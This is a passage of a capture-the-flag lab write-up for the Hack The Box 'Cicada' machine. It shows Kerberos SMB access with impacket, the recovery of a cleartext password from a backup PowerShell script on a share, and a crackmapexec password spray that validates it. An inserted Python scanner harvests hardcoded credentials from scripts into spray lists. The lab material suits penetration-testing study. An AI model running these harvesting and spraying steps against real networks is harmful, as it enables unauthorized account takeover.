david.orelious Session


Using the TGT of the david.orelious user, I can authenticate to the target SMB server

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ KRB5CCNAME=david.orelious@cicada-dc.cicada.htb.ccache impacket-smbclient CICADA.HTB/david.orelious@cicada-dc.cicada.htb -no-pass -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Type help for list of commands
# 

Authenticated

# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use DEV
# ls
drw-rw-rw-          0  Wed Aug 28 19:27:31 2024 .
drw-rw-rw-          0  Thu Mar 14 13:21:29 2024 ..
-rw-rw-rw-        601  Wed Aug 28 19:28:22 2024 Backup_script.ps1

There is a PowerShell script located in the //cicada-dc.cicada.htb/DEV share

Backup_script.ps1


# get Backup_script.ps1

Downloading the PowerShell script to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat Backup_script.ps1
 
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The Backup_script.ps1 file contains the cleartext credential of the emily.oscars user: Q!3@Lp#M6b*7t*Vt. Because the password is built with ConvertTo-SecureString -AsPlainText, anyone who can read the share reads the password; the SecureString adds no protection here. Another thing to note is that the script writes its archive to a second drive, D:\, so the host has more than one volume.
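The finding above generalizes: any script left on a readable share is worth grepping for embedded secrets before moving on, and doing it systematically catches more than the one obvious ConvertTo-SecureString line. The scanner below is an added example, not part of the original writeup and not an impacket or crackmapexec feature. It runs over constructed copies of scripts (the first mirrors Backup_script.ps1, the second is a hypothetical script on an assumed HR share), extracts secrets set via ConvertTo-SecureString -AsPlainText, password-like variable assignments and inline net use passwords, pairs each with the nearest preceding username assignment, and emits deduplicated user:password pairs ready for a spray.

```python
import re

# Constructed sample scripts (not files pulled from the target). The first
# mirrors the shape of Backup_script.ps1 from the DEV share; the second is a
# hypothetical script on an assumed HR share that exercises the other patterns.
SAMPLES = {
    "DEV/Backup_script.ps1": r'''
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
''',
    "HR/map_drive.ps1": r'''
# hypothetical drive-mapping script
$user = "svc_backup"
$pwd = 'Winter2023!'
net use Z: \\fileserver\share /user:CICADA\svc_backup Winter2023!
''',
}

# Each pattern yields a "secret" group; the net use pattern also yields "user".
SECRET_PATTERNS = [
    ("ConvertTo-SecureString -AsPlainText literal",
     re.compile(r"""ConvertTo-SecureString(?=.*-AsPlainText)\s+(?:-AsPlainText\s+)?(?P<q>["'])(?P<secret>[^"']+)(?P=q)""", re.I)),
    ("password-like variable assigned a literal",
     re.compile(r"""\$(?:password|passwd|pass|pwd|secret)\s*=\s*(?P<q>["'])(?P<secret>[^"']+)(?P=q)""", re.I)),
    ("net use with inline password",
     re.compile(r"""\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)""", re.I)),
]

# A username assignment seen earlier in the file is paired with later secrets.
USER_PATTERN = re.compile(
    r"""\$(?:username|user|uname|account)\s*=\s*(?P<q>["'])(?P<user>[^"']+)(?P=q)""", re.I)


def find_credentials(name, text):
    """Return one finding per line that carries a hardcoded secret."""
    hits = []
    last_user = None
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USER_PATTERN.search(line)
        if m:
            last_user = m.group("user")
        for kind, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            # Prefer a username on the same line (net use), else the last one seen.
            user = m.groupdict().get("user") or last_user
            hits.append({"file": name, "line": lineno, "kind": kind,
                         "user": user, "secret": m.group("secret")})
            break  # one finding per line is enough
    return hits


def credential_pairs(hits):
    """Deduplicated (user, password) pairs; DOMAIN\\user is reduced to user."""
    pairs = []
    for h in hits:
        user = (h["user"] or "<unknown>").split("\\")[-1]
        pair = (user, h["secret"])
        if pair not in pairs:
            pairs.append(pair)
    return pairs


if __name__ == "__main__":
    all_hits = []
    for name, text in SAMPLES.items():
        for h in find_credentials(name, text):
            print(f"{h['file']}:{h['line']} [{h['kind']}] user={h['user']} secret={h['secret']}")
            all_hits.append(h)
    print("spray candidates:")
    for user, secret in credential_pairs(all_hits):
        print(f"  {user}:{secret}")
```

The output pairs feed directly into a crackmapexec run with -u and -p lists; the patterns are deliberately loose (they will flag test fixtures and placeholder strings too), which is the right trade-off when reviewing a handful of files by hand.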

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'Q!3@Lp#M6b*7t*Vt' --continue-on-success
SMB         10.129.41.192   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\administrator:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\guest:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\cicada-dc$:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\john.smoulder:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\michael.wrightson:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\david.orelious:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt 

Valid

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/emily.oscars@cicada-dc.cicada.htb' -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Q!3@Lp#M6b*7t*Vt
[*] Saving ticket in emily.oscars@cicada-dc.cicada.htb.ccache

TGT generated for the emily.oscars user